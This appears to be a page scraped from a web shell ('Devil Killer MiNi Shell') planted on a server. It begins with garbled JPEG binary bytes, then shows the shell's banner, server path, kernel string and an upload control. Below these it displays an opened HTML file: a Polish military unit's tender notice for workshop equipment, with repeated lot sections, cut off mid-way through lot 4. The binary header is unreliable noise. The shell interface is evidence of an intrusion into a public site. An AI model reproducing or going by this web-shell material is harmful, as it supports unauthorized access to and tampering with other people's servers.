JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/0023361101-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa drobnego wyposażenia i urządzeń warsztatowych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">10 Brygada Logistyczna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 532213882</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. ks. Bolesława Domańskiego 68</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-820</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">10blog.zampubliczne@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.10blog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka Wojskowa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e34deccd-d2b4-41b2-86e9-76dab63b5630</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00233611</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00130882/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Urządzenia warsztatowe</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/10blog <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest w języku polskim w formie elektronicznej za<br/>pośrednictwem platformazakupowa.pl pod adresem:<br/>https://platformazakupowa.pl/pn/10blog</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę wraz z wymaganymi dokumentami należy umieścić na portalu platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/10blog w myśl Ustawy PZP na stronie internetowej prowadzonego postępowania.<br/>2. Do oferty należy dołączyć wszystkie wymagane w SWZ dokumenty.<br/>3. Po wypełnieniu Formularza składania oferty lub wniosku i dołączenia wszystkich wymaganych załączników należy kliknąć przycisk „Przejdź do podsumowania”.<br/>4. Oferta i inne dokumenty składane elektronicznie muszą zostać podpisane elektronicznym podpisem kwalifikowanym, podpisem zaufanym lub podpisem osobistym. W procesie składania oferty za pośrednictwem platformazakupowa.pl, Wykonawca powinien złożyć podpis bezpośrednio na dokumentach przesłanych za pośrednictwem platformazakupowa.pl. Zalecamy stosowanie podpisu na każdym załączonym pliku osobno, w szczególności wskazanych w art. 63 ust. 2 ustawy PZP, gdzie zaznaczono, iż oferty, wnioski o dopuszczenie do udziału w postępowaniu oraz oświadczenie, o którym mowa w art. 125 ust.1 sporządza się, pod rygorem nieważności, w postaci lub formie elektronicznej i opatruje się odpowiednio w odniesieniu do wartości postępowania kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>5. Za datę złożenia oferty przyjmuje się datę jej przekazania w systemie (platformie) w drugim kroku składania oferty poprzez kliknięcie przycisku “Złóż ofertę” i wyświetlenie się komunikatu, że oferta została zaszyfrowana i złożona.<br/>6. Szczegółowa instrukcja dla Wykonawców dotycząca złożenia, zmiany i wycofania oferty znajduje się na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>􀀀 administratorem Pani/Pana danych osobowych jest 10.Brygada Logistyczna,<br/>z siedzibą ul. Domańskiego 68, 45-820 Opole, nr tel. 261 625 021;<br/>􀀀 inspektorem ochrony danych osobowych w 10.Brygadzie Logistycznej jest Pan Grzegorz Skoczka, tel. 261 62 55 95, e-mail g.skoczka@ron.mil.pl;<br/>􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym bez negocjacji;<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy PZP;<br/>􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>􀀀 obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy PZP, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego;<br/>􀀀 konsekwencje niepodania określonych danych wynikają z ustawy PZP;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22 RODO;<br/>􀀀 posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>􀀀 nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">10/CZ-SAM/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 327024,53 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">12</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 1: Przedmiotem zamówienia jest drobne wyposażenie i urządzenia warsztatowe </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 27967,16 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 2: Przedmiotem zamówienia jest drobne wyposażenie i urządzenia warsztatowe </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 17017,84 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Cześć nr 3: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 72037,06 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	Cena oferty suma wartości zamówienia podstawowego oraz opcjonalnego <br/>(C) = najkorzystniejsza oferta / badana oferta x 100 %<br/>9.	Za najkorzystniejszą ofertę zamawiający uzna ofertę, która uzyska największą liczbę punktów obliczoną jako suma punktów przyznanych w poszczególnych kryteriach.<br/>a.	Wynik końcowy (W) = C</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4: Dostawa drobnego wyposażenia i urządzeń warsztatowych </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 3517,60 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43800000-1 - Urządzenia warsztatowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający przewiduje prawo opcji.<br/>a.	Wykaz ilościowy i asortymentowy zamówienia opcjonalnego zawierają Formularze asortymentowo-cenowe - załączniki nr 3.1 – 3.12<br/>b.	Oferta Wykonawcy powinna przedstawiać cenę zamówienia z uwzględnieniem jego pełnego zakresu (tj. zamówienia podstawowego i opcjonalnego).<br/>c.	Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem zamawiającego. Zamawiający może z prawa opcji nie skorzystać lub skorzystać w części.<br/>d.	Nie skorzystanie przez zamawiającego z prawa opcji nie rodzi po stronie wykonawcy żadnych roszczeń w stosunku do zamawiającego.<br/>e.	Zamówienie objęte prawem opcji wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu zawiadomienia, że zamawiający zamierza z opcji skorzystać.<br/>f.	Zamawiający jest uprawniony do skorzystania z prawa opcji w ciągu 28 dni kalendarzowych od daty poinformowania przez Zamawiającego o wykorzystaniu zamówienia opcjonalnego, jednak nie później niż do 28 listopada 2025r. (w zależności od tego, który z wyżej wymienionych terminów upłynie wcześniej)<br/>g.	Dodatkowe informacje dotyczące prawa opcji zawarto w Projektowanych postanowieniach umowy - załącznik nr 1. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">8.	Zamawiający dokona oceny ofert, przyznając 1 pkt za każdy 1 % wagi poniższych kryteriów:<br/>a.	